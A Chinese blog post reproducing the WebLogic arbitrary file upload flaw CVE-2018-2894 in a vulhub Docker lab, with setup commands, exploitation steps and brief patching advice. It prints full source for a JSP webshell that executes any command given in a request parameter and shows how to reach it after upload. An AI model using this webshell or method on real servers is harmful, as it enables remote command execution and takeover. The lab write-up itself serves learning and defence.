Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

这篇具有很好参考价值的文章主要介绍了Weblogic 任意文件上传漏洞(CVE-2018-2894)复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

weblogic 

漏洞环境准备

漏洞复现

修复建议


weblogic 

WebLogic美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用数据库应用Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

CVE-2018-2894 该漏洞属于一个远程上传漏洞,通过更改Work Home工作目录,用有效的已部署的Web应用目录替换默认的存储JKS Keystores文件的目录,之后使用"添加Keystore设置"的功能,可上传恶意的JSP脚本文件,造成攻击。两个页面分别为/ws_utc/begin.do/ws_utc/config.do

受影响的版本weblogic 10.3.6.0weblogic 12.1.3.0weblogic 12.2.1.2weblogic 12.2.1.3

漏洞环境准备

下载好vulhub

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

 进入目录启动 weblogic 12.2.1.3

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

docker-compose up -d

查看端口情况

docker-compose  ps

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

执行docker-compose logs | grep password可查看管理员密码

管理员用户名为weblogic

密码为B6eYMuo9

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

环境启动后,访问http://your-ip:7001/console,即可看到后台登录页面。使用刚刚获得的账号密码登录

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

登录后台页面,点击base_domain的配置,在高级中开启启用 Web 服务测试页选项:记得保存设置!!!要不然利用不到webshell

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

 Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

接下来访问http://your-ip:7001/ws_utc/config.do,设置Work Home Dir/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css。我将目录设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的,这一点很重要。

漏洞复现

写一个jsp文件上传

这里我们上传一个可以利用的webshell  

<%@ page import="java.util.*,java.io.*"%>

<%

%>

<HTML><BODY>

Commands with JSP

<FORM METHOD="GET" NAME="myform" ACTION="">

<INPUT TYPE="text" NAME="cmd">

<INPUT TYPE="submit" VALUE="Send">

</FORM>

<pre>

<%

if (request.getParameter("cmd") != null) {

    out.println("Command: " + request.getParameter("cmd") + "<BR>");

    Process p;

    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){

        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));

    }

 else{

        p = Runtime.getRuntime().exec(request.getParameter("cmd"));

    }

    OutputStream os = p.getOutputStream();

    InputStream in = p.getInputStream();

    DataInputStream dis = new DataInputStream(in);

    String disr = dis.readLine();

    while ( disr != null ) {

    out.println(disr);

    disr = dis.readLine();

    }

}

%>

</pre>

</BODY></HTML>

通过抓包我们可以发现返回了时间戳(我上传了两个jsp返回两个时间戳)

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

然后访问

http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

即可执行webshell

例如返回时间戳为1673447062823  上传jsp文件名为  4.jsp

访问

http://192.168.10.142:7001/ws_utc/css/config/keystore/1673447062823_4.jsp

Weblogic 任意文件上传漏洞(CVE-2018-2894)复现

实验完成后记得关闭weblogic文章来源地址https://www.toymoban.com/news/detail-428221.html

docker-compose  down

修复建议

  1. 升级到官方的最新版本;
  2. config.do,begin.do页面强制登录后才授权后访问

到了这里,关于Weblogic 任意文件上传漏洞(CVE-2018-2894)复现的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【vulhub漏洞复现】CVE-2016-3088 ActiveMQ任意文件写入漏洞

    影响版本:Apache ActiveMQ 5.x~5.14.0 漏洞原理:ActiveMQ中存储文件的fileserver接口支持写入文件,但是没有执行权限。可以通过MOVE文件至其他可执行目录下,从而实现文件写入并访问。 ActiveMQ在5.12.x~5.13.x版本中,默认关闭了fileserver这个应用(但是可以在conf/jetty.xml中开启);在5

    2024年02月12日
    浏览(51)
  • 【漏洞复现】Weblogic CVE-2023-21839

    1. 产品简介 WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。 2. 漏洞简介 Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证

    2023年04月16日
    浏览(40)
  • 【漏洞复现】Ruby on Rails 路径穿越与任意文件读取漏洞(CVE-2019-5418)

    1. 漏洞简介 Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们可以通过修改访问某控制器的请求包,通过…/…/…/…/来达到路径穿越的目的,然后再通过{{来闭合模板查询路径,那我们访问的文件会被当做外部

    2024年02月04日
    浏览(58)
  • ActiveMQ 任意文件上传漏洞复现

    ​ 访问 http://ip:8161/admin/ 进入admin登陆页面,使用弱口令登陆,账号密码皆为 admin,登陆成功后,headers中会出现验证信息 ​ 如:  Authorization: Basic YWRtaW46YWRtaW4= ​ 访问任意页面并抓包,注意headers中的验证信息 ​ 将GET协议修改为PUT协议,将文件上传至 fileserver 目录下 ​ 如上

    2024年04月16日
    浏览(49)
  • 春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)

      靶标介绍: Subrion CMS 4.2.1 存在文件上传漏洞 进入题目: admin/admin    点击设置:  后台管理主页:  上传页面: 上传目录: /panel/uploads/   查看上传位置:  上传位置:  uploads/system.pht  flag{24505f02-d430-4d3b-905e-17349e09c34c}

    2024年02月11日
    浏览(32)
  • 致远OA wpsAssistServlet 任意文件上传漏洞 漏洞复现

    致远OA是一套办公协同管理软件。致远OA wpsAssistServlet接口存在任意文件上传漏洞,攻击者通过漏洞可以发送特定的请求包上传恶意文件,获取服务器权限。 致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致远OA G6、G6N (V8.1、V8.1SP1) 1、调用文件上传接口上传测试文件,请求包如下: 2、

    2024年02月11日
    浏览(61)
  • 【漏洞复现】Apache_Tomcat_PUT方法任意写文件(CVE-2017-12615)

    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 说明 内容 漏洞编号 CVE-2017-12615 漏洞名称 Tomcat_PUT方法任意写文件 漏洞评级 高危 影响范围 Tomcat版本:8.5.19 漏洞描述 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件 修复方案

    2024年02月05日
    浏览(35)
  • 蓝凌OA sysUiComponent 任意文件上传漏洞复现

         蓝凌核心产品EKP平台定位为新一代数字化生态OA平台,数字化向纵深发展,正加速构建产业互联网,对企业协作能力提出更高要求,蓝凌新一代生态型OA平台能够支撑办公数字化、管理智能化、应用平台化、组织生态化,赋能大中型组织更高效的内外协作与管理,支撑商

    2024年02月05日
    浏览(42)
  • 中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现

    中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中间件-Weblogic安全 2、中间件-JBoos安全 3、中间件-Jenkins安全 4、中间件-GlassFish安全 常见中间件的安全测试: 1、配置

    2024年02月08日
    浏览(41)
  • Weblogic反序列化(CVE-2023-21839)漏洞复现

    序列化(Serialization):将对象的状态信息转换为可以存储或传输的形式的过程,一般将对象转换为字节流。序列化时,对象的当前状态被写入到临时或持久性存储区(文件、内存、数据库等)。 反序列化(Deserialization):从序列化的表示形式中提取数据,即把有序字节流恢

    2024年02月07日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包